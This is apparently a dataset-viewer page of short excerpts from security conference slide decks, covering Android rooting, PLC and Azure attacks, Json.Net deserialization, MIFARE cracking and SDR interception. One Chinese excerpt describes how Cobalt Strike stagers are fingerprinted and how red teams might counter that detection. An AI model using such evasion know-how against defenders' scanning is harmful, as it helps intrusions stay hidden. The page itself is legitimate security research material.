Federation & Empire
Emmanuel Bouillon
manu@veryopenid.net
DEF CON #19 - 7th August 2011
Prelude to Federation
Forward the Federation
Federation
Federation and Empire
Federation’s Edge
Federation and (down to) Earth
Prefatory notes
$ whoami
Having fun in INFOSEC for a while
SSTIC, PacSec, BlackHat EU, Hack.lu, #Days
CVE... | pdf |
1
Copyright © 2011 Juniper Networks, Inc. www.juniper.net
AppSecure
Brad Woodberg, Juniper Networks
bwoodberg@juniper.net
twitter: @bradmatic517
Defcon 2011
Network Application Firewalls: Exploits and Defense
2
Copyright © 2011 Juniper Networks, Inc. www.juniper.net
AGENDA
Discussion
Beyond ... | pdf |
Android Universal Root
Exploiting xPU Drivers
Xingyu Jin
Richard Neal
Jon Bottarini
#BHUSA @BlackHatEvents
#BHUSA @BlackHatEvents
Who are we?
Jon Bottarini
@jon_bottarini
Xingyu Jin
@1ce0ear
Richard Neal
@ExploitDr0id
#BHUSA @BlackHatEvents
What are we talking about?
●
Rooting exploits on Android
○
In-the-wild
○
... | pdf |
We are Legion: Pentesting with an
Army of Low-power Low-cost
Devices
Philip Polstra
Hacker in Residence
University of <Redacted>
@ppolstra
http://polstra.org
What is this talk about?
● Hacking and/or forensics with small,
low-power devices
● ARM-based Beagleboard &
Beaglebone running full suite of
security/forensi... | pdf |
/0
2^32
4,294,967,296
2^128
340,282,366,920,938,463,463,374,607,431,768,211,456
/1
2^31
2,147,483,648
2^127
170,141,183,460,469,231,731,687,303,715,884,105,728
/2
2^30
1,073,741,824
2^126
85,070,591,730,234,615,865,843,651,857,942,052,864
/3
2^29
536,870,912
2^125
42,535,295,865,117,307,932,921,825,928,971,026,432
/4
2... | pdf |
新一代的恐怖袭击
基于树莓派的
渗透测试
锦龙信安(威客众测平台)
高级安全工程师 ——MXi4oyu
什么是树莓派
Raspberry Pi(中文名为“树莓派”,简写为RPi,或者RasPi/RPi)是只有信
用卡 大小的微型计算机。
树莓派之父:埃本·阿普顿(Eben Epton)
初心:能够在帮助小孩学习的同时,也能让他感受到在学习编程过程中的
愉悦感。
树莓派的特点
(1)可编程、可拓展(可编程控制GPIO口,可接各种传感器模块等)
(2)可学习、可娱乐(集学习和娱乐于一身)
(3)携带方便(一张标准的信用卡大小)
(4)成本低(25美元)
主要版本
树莓派B
树莓派B+
树莓派接线图
小试牛刀-准备工作
(1)树莓派... | pdf |
Exploit
PLC
on
the
internet
Z-‐0ne
概述
什么是PLC
为什么会联网
PLC
• Programmable
Logic
Controller
– 电源
– CPU
– 存储
– I/O
– 网络模块
PLC功能
• PLC功能
– 顺序控制
– 逻辑控制
• PLC应用
– 自动化控制
– 过程控制
其他
• PLC内核
– Codesys
– ProConos
• 底层操作系统
– Linux
– Vxworks
– WinCE
• 通信协议
– 通用
• Modbus
– 私有
• S7
• Omron
FINS
PLC通信
• 串行
– RS232/... | pdf |
fox-it.com
Pwning your Azure environment
Dirk-jan Mollema / @_dirkjan
I’m in your cloud…
-
Lives in The Netherlands
-
Hacker / Red Teamer / Researcher @ Fox-IT since 2016
-
Author of several Active Directory tools
-
Mitm6
-
ldapdomaindump
-
BloodHound.py
-
aclpwn.py
-
Co-author of ntlmrelayx
-
One of the MSRC Most Valu... | pdf |
Guess Where I am:
Android模拟器躲避的检测与应对
胡文君(MindMac) 肖梓航(Claud Xiao)
模拟器检测技术
模拟器技术应用广泛
• Google、安全企业使用模拟器检测恶意代码
• 为什么用模拟器而不是真机?
– 经济成本低
– 高度可定制
– 易于开发
– 容易部署
模拟器检测技术现状
•
Timothy Vidas and Nicolas Christin, Evading Android Runtime Analysis
via Sandbox Detection, ASIACCS’14
•
赵闽 and 倪超,逃离安卓动态检测&订票助手一日谈,HitCon 2013
•
Tim S... | pdf |
云影实验室
1 / 17
.NET 高级代码审计(第二课) Json.Net 反序列化漏洞
Ivan1ee@360 云影实验室
2019 年 03 月 01 日
云影实验室
2 / 17
0X00 前言
Newtonsoft.Json,这是一个开源的 Json.Net 库,官方地址:
https://www.newtonsoft.com/json ,一个读写 Json 效率非常高的.Net 库,在做开
发的时候,很多数据交换都是以 json 格式传输的。而使用 Json 的时候,开发者很多时
候会涉及到几个序列化对象的使用:DataContractJsonSerializer,
JavaScriptSerial... | pdf |
MIFARE Classic:
Completely Broken
Chen-Mou Cheng
Dept. Electrical Engineering
National Taiwan University
Introduction
• MIFARE Classic
– 0wned by NXP Semiconductors, Inc.
– The most widely deployed RFID technology
• Over 1 billion cards sold
• Main uses
– Public transportation ticketing systems
– Access control systems... | pdf |
An Anti-Mitigation Exploit Generation
Integrating with Metasploit Framework
Vince Chen
Software Quality Laboratory, NCTU
About me
Vince Chen
●
MS in Computer
Science and
Engineering of NCTU
●
Software Quality
Laboratory
2
About SQLab
●
Advisor: Prof. Shih-Kun Huang
●
Current members:
Ph.D student * 3
MS student... | pdf |
Intercepting, modifying, and generating
wireless signals with SDR
Caleb Madrigal
(Public) handle: metem
Website: http://calebmadrigal.com/
Twitter: @caleb_madrigal
Ham call sign: w0hak
About Caleb:
Programming for about 18 years.
I most enjoy hacking and mathy stuff (Signal processing, Machine Learning, AI)
In general... | pdf |
Breaking SSL using time synchronisation attacks
Jose Selvi, Senior Security Consultant
• Jose%Selvi%
• +10%years%working%in%security%
• Senior%security%Consultant%
• SANS%Institute%Community%Instructor%
• GIAC%Security%Expert%(GSE)%
• Twitter:%@JoseSelvi%
• Blog:%http://www.pentester.es
$ whois jselvi
Valencia: Beach, ... | pdf |
Bypassing Endpoint
Security for $20 or
Less
Philip A. Polstra, Sr.
@ppolstra
ppolstra.blogspot.com
•
Why this talk?
•
Who is this dude talking at me?
•
Brief history of USB
•
How does USB work?
•
It’s all descriptors and endpoints
•
Bulk-only mass storage devices
•
Bypassing endpoint security
•
Microcontro... | pdf |
技
术
标
准
研发运营一体化能力成熟度模型
第 2 部分:敏捷开发管理过程
The DevOps capability maturity model
Part 2: Agile management process
(征求意见稿)
2017 年 11 月 18 日
YDB XXXXX—XXXX
I
目 次
目次!........................................................................................................................................!I
前言!........... | pdf |
PE格式详解
概述
PE文件的全称为Portable Executable,是windows操作系统下可执行文件的一种文件格式,符合
COFF标准(Common Object File Format:https://en.wikipedia.org/wiki/COFF),除了我们常见的exe文
件,像windows下的动态链接库文件(.dll),内核驱动(.srv),控制面板文件(.cpl)等都属于PE文件。
PE文件是一种数据结构,里面包含了OS加载程序能够把它加载到内存中并运行的所需的信息。
结构预览
一个典型的PE结构如下图所示:
如果使用PEbear(https://github.com/hasherezade/pe... | pdf |
Cyber-hijacking Airplanes:
Truth or Fiction?
Dr. Phil of Bloomsburg University
@ppolstra
http://philpolstra.com
Captain Polly of University of <redacted>
@CaptPolly
Why This Talk?
● Lots of bold claims concerning the
feasibility of cyber-hijacking
● Bold claims get lots of press
● Most people don't know enough to
ev... | pdf |
关于CobaltStrike的Stager被扫问题
随着CobaltStrike(下文简称CS)的广泛应用,各种检测脚本和空间测绘扫描系统都盯上了CS,作为夹
缝中求存的公鸡队(红队),不得不反击一波。
下面是检测的手法和相关文章,还不清楚的兄弟可以阅读下:
https://github.com/whickey-r7/grab_beacon_config
https://mp.weixin.qq.com/s/BLM8tM88x9oT4CjSiupE2A
这个检测手法其实不是什么秘密,我们看下代码
很清晰,很明白,我解释一下,就是请求stager的时候只要符合以上规则的url就可以成功请求到stager
的代码。
公鸡队的兄弟们,对抗... | pdf |
Scanner Frequencies: Riviera Hotel and Casino Trunking System, Las Vegas, Nevada
http://radioreference.com/modules.php?name=RR&sid=4413
1 of 2
6/18/2007 14:54
NOT LOGGED IN
Home · Your Account · Forums · Database · Wiki · Submit Info
Search
RR Help Desk
Riviera Hotel and Casino System
US > Nevada > Clark C... | pdf |
Please&
Stand&
by&this&
talk&
will&
start&
soon!&
DEF CON
2018-13-05 Beijing, China
From Dark
Visitors to
Valued
Allies.
You&may&have&seen&me&rob&a&bank&on&NatGeo&TV&show&Breakthrough&Season&2…&
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!... | pdf |
Crypto for Hackers
The Workshop
Eijah
v1.00
August 7th, 2015
Who am I?
3
• Founder
• Programmer
• Hacker
Prerequisites
• Laptop
• Linux (gcc 4.7), Windows (MSVC 2013)
• Crypto++
• www.cryptopp.com
• Boost 1_58_0
• www.boost.org
• Workshop Files
• www.demonsaw.com
• Qmake
• www.qt.io
• Optional to create your own Makefi... | pdf |
1
2022 年中国网络安全行业
《API 安全产品及服务购买指南》
2022 年 9 月发布版
1
目录
前言 .................................................................................................................................................. 1
Akamai 阿卡迈 ................................................................................................... | pdf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.